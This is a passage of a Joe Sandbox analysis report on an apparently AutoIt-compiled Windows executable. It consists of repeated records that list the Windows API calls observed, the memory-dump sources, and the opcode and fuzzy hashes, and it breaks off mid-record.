7ff64397e154-7ff64397e15a 694->696 699 7ff64397e135-7ff64397e142 call 7ff643944c24 695->699 700 7ff64397e11f-7ff64397e130 call 7ff643944c24 * 2 695->700 696->672 703 7ff64397e160-7ff64397e169 696->703 699->694 700->699 703->665 710 7ff64397e05d-7ff64397e06a call 7ff643944c24 705->710 711 7ff64397e047-7ff64397e058 call 7ff643944c24 * 2 705->711 706->672 708 7ff64397e07c-7ff64397e082 706->708 708->672 713 7ff64397e088-7ff64397e091 708->713 710->706 711->710 713->689
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 3249950245-0
                                                                      • Opcode ID: c98894d22354e7b9f6123bf715ce3834dde4ed65d192f2dc08ca791b65f211be
                                                                      • Instruction ID: 8ca3f1b1203dca7487b16743742c1b0956ea906428a89c4977d5f0b60b20decd
                                                                      • Opcode Fuzzy Hash: c98894d22354e7b9f6123bf715ce3834dde4ed65d192f2dc08ca791b65f211be
                                                                      • Instruction Fuzzy Hash: 18228272A0C68286FB68FB24D4463B967A0FB45744F144136DA8DE7AD6EF3CE441E700

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 849 7ff643923cbc-7ff643923d88 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$Show
                                                                      • String ID: AutoIt v3$d$edit
                                                                      • API String ID: 2813641753-2600919596
                                                                      • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                      • Instruction ID: b72f02b878fa18acf8f48a0fc2345963c456ae238b1df44c7cd586fac59f84c8
                                                                      • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                      • Instruction Fuzzy Hash: 65219D72A2CB41C6EB50EB10F48A32977E0F788799F004238E68DD6664DFBDC085DB14

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942D8E
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942D9C
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DAC
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DBC
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DCA
                                                                        • Part of subcall function 00007FF643942D5C: MapVirtualKeyW.USER32(?,?,?,00007FF643927FA5), ref: 00007FF643942DD8
                                                                        • Part of subcall function 00007FF64393EEC8: RegisterWindowMessageW.USER32 ref: 00007FF64393EF76
                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64392106D), ref: 00007FF643928209
                                                                      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64392106D), ref: 00007FF64392828F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64392106D), ref: 00007FF64396D36A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: AutoIt
                                                                      • API String ID: 1986988660-2515660138
                                                                      • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                      • Instruction ID: 677e1d87d82b08f4442238b4f5ae28efdfcb582854d98426c360fc6c0d752483
                                                                      • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                      • Instruction Fuzzy Hash: E4C10871D9CB6285FA40FB14E9830B47BA8BF95350F50023AE45DE2661EFBCA191E760

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3135491444-1585850449
                                                                      • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                      • Instruction ID: 0bd39142e68d0d590d21d7a85b28489bbbaf47ad2ebe0a3509667068b95fe831
                                                                      • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                      • Instruction Fuzzy Hash: 37417832A0CA4696EB20FB20E5422F93761FB45344F945435E68CE369BEF7CE548E750
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF64396BAA2
                                                                        • Part of subcall function 00007FF6439256D4: GetFullPathNameW.KERNEL32(?,00007FF6439256C1,?,00007FF643927A0C,?,?,?,00007FF64392109E), ref: 00007FF6439256FF
                                                                        • Part of subcall function 00007FF643923EB4: GetLongPathNameW.KERNELBASE ref: 00007FF643923ED8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                      • API String ID: 779396738-2360590182
                                                                      • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                      • Instruction ID: 142b49bd084a4102e858ff7937920a03d6c0b27b59892748323b048f2d03ef0a
                                                                      • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                      • Instruction Fuzzy Hash: 02318A2260CB8289E710FB21E9411AD77A8FB49B84F584535EA8CD3B9AEF3CD545DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3812282468-0
                                                                      • Opcode ID: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                      • Instruction ID: 18f8c6fece3c17af2a13623395e8e6f4dc3a46b7d703cafcfd2e52f1e3b946a5
                                                                      • Opcode Fuzzy Hash: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                      • Instruction Fuzzy Hash: 8231F322A1C7C287FB65BB1191022B93799EB45FC8F184031CE4DA7B4ADE2CD644CB10
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF643926F52,?,?,?,?,?,?,00007FF64392782C), ref: 00007FF643926FA5
                                                                      • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF643926F52,?,?,?,?,?,?,00007FF64392782C), ref: 00007FF643926FD3
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF643926F52,?,?,?,?,?,?,00007FF64392782C), ref: 00007FF643926FFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                      • Instruction ID: e6e84dcbf627f3192be22a37e30200bc998cf1283178b8596169e08ad0887e94
                                                                      • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                      • Instruction Fuzzy Hash: 1E218B33A1CB4187E750AF29E5419AE73A4FB48B84B441531EB8DE3B16EF39E414DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                      • Instruction ID: 82affd4cbfacfe24c85fd2a4b97704f104438bdb749d5181ef2598fdf880d6e2
                                                                      • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                      • Instruction Fuzzy Hash: B3E01A20B0C70182EB44BB609C8B77A2352AF98B52F005038C81EE6393EE3DE848A700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: 7bec802cbd1a87009617c2811a6b9062f2906cccecad6531e84376474dd06857
                                                                      • Instruction ID: 7412a2091b69e2217e094c448eac8efd8196c9bdeca1f001627d740c124d8b57
                                                                      • Opcode Fuzzy Hash: 7bec802cbd1a87009617c2811a6b9062f2906cccecad6531e84376474dd06857
                                                                      • Instruction Fuzzy Hash: 78226B72B0C6428AFB14FF65D4822AC27A1FB48B88F504536DA4DE7B96EF38E455D340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                      • Instruction ID: 7368c91d448b6841cd57d08f194f3d7898d78ef3a89df81b4549018e5a6ff6de
                                                                      • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                      • Instruction Fuzzy Hash: CD41B53290CA4282F760BF20E5063797790EB45768F045634EA6DE7ACAEF7DD404EB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                      • Instruction ID: fcf04fa373654b0ccf95202842dc9a2836ddafc839c6ddd554d9ab0756bb6e72
                                                                      • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                      • Instruction Fuzzy Hash: 10413022B18A528AFB10FF25D9523FC23A0EB44788F454531EA4DE7A9AEF7CD944D740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                      • Instruction ID: eba8245e3bdac59b4e35ae6e39df123ec173de99347abc177f3b50e6a5057ef2
                                                                      • Opcode Fuzzy Hash: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                      • Instruction Fuzzy Hash: 93416B3290DB4686EB51FF11E5423A937A8FB48B88F444435EA4CA778ADF7CE580D750
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00007FF643923756
                                                                        • Part of subcall function 00007FF643949334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643949348
                                                                        • Part of subcall function 00007FF6439236E8: SystemParametersInfoW.USER32 ref: 00007FF643923705
                                                                        • Part of subcall function 00007FF6439236E8: SystemParametersInfoW.USER32 ref: 00007FF643923725
                                                                        • Part of subcall function 00007FF6439237B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF6439237F2
                                                                        • Part of subcall function 00007FF6439237B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923807
                                                                        • Part of subcall function 00007FF6439237B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF64392388D
                                                                        • Part of subcall function 00007FF6439237B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923924
                                                                      • SystemParametersInfoW.USER32 ref: 00007FF643923797
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4207566314-0
                                                                      • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                      • Instruction ID: 742e227f844f5342116e842c561deda3eb474f6168cf3332567bfe5eb8efd712
                                                                      • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                      • Instruction Fuzzy Hash: 70016970E5C6038AFB40FB65A9931B87B61AF18300F040035E44CE62A3EE2CB4C4AB20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                      • Instruction ID: 12a4aaba5a5dd75c143f83dc312f797c18fc05050b4919037a1554c45470ded9
                                                                      • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                      • Instruction Fuzzy Hash: 84E04F52E1D103C2FE447BB2580707416915F54742B444030C90DF6253FE2C94C55B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast
                                                                      • String ID:
                                                                      • API String ID: 918212764-0
                                                                      • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                      • Instruction ID: 9d407374583290089dfa17592fd808125de2e051be210616455931b1314d4ac9
                                                                      • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                      • Instruction Fuzzy Hash: D311C861F0E24352FEA4B765A5D72BC12C15F947A4F041134DA2EE63D7FE6CE885A301
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                      • Instruction ID: 14969a0c492d86f0d099c7df2e75ae5ef8382c260065a41db82edf5f0f34ca2a
                                                                      • Opcode Fuzzy Hash: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                      • Instruction Fuzzy Hash: 1432B362A0C682C5EB64FB15D4463B96761FB88B88F144131DE5EE7BA6EF3CE441E700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                      • Instruction ID: dc06ae0e537d59d651846d85540e34fdecae5035d72bc2930da44976b74602cb
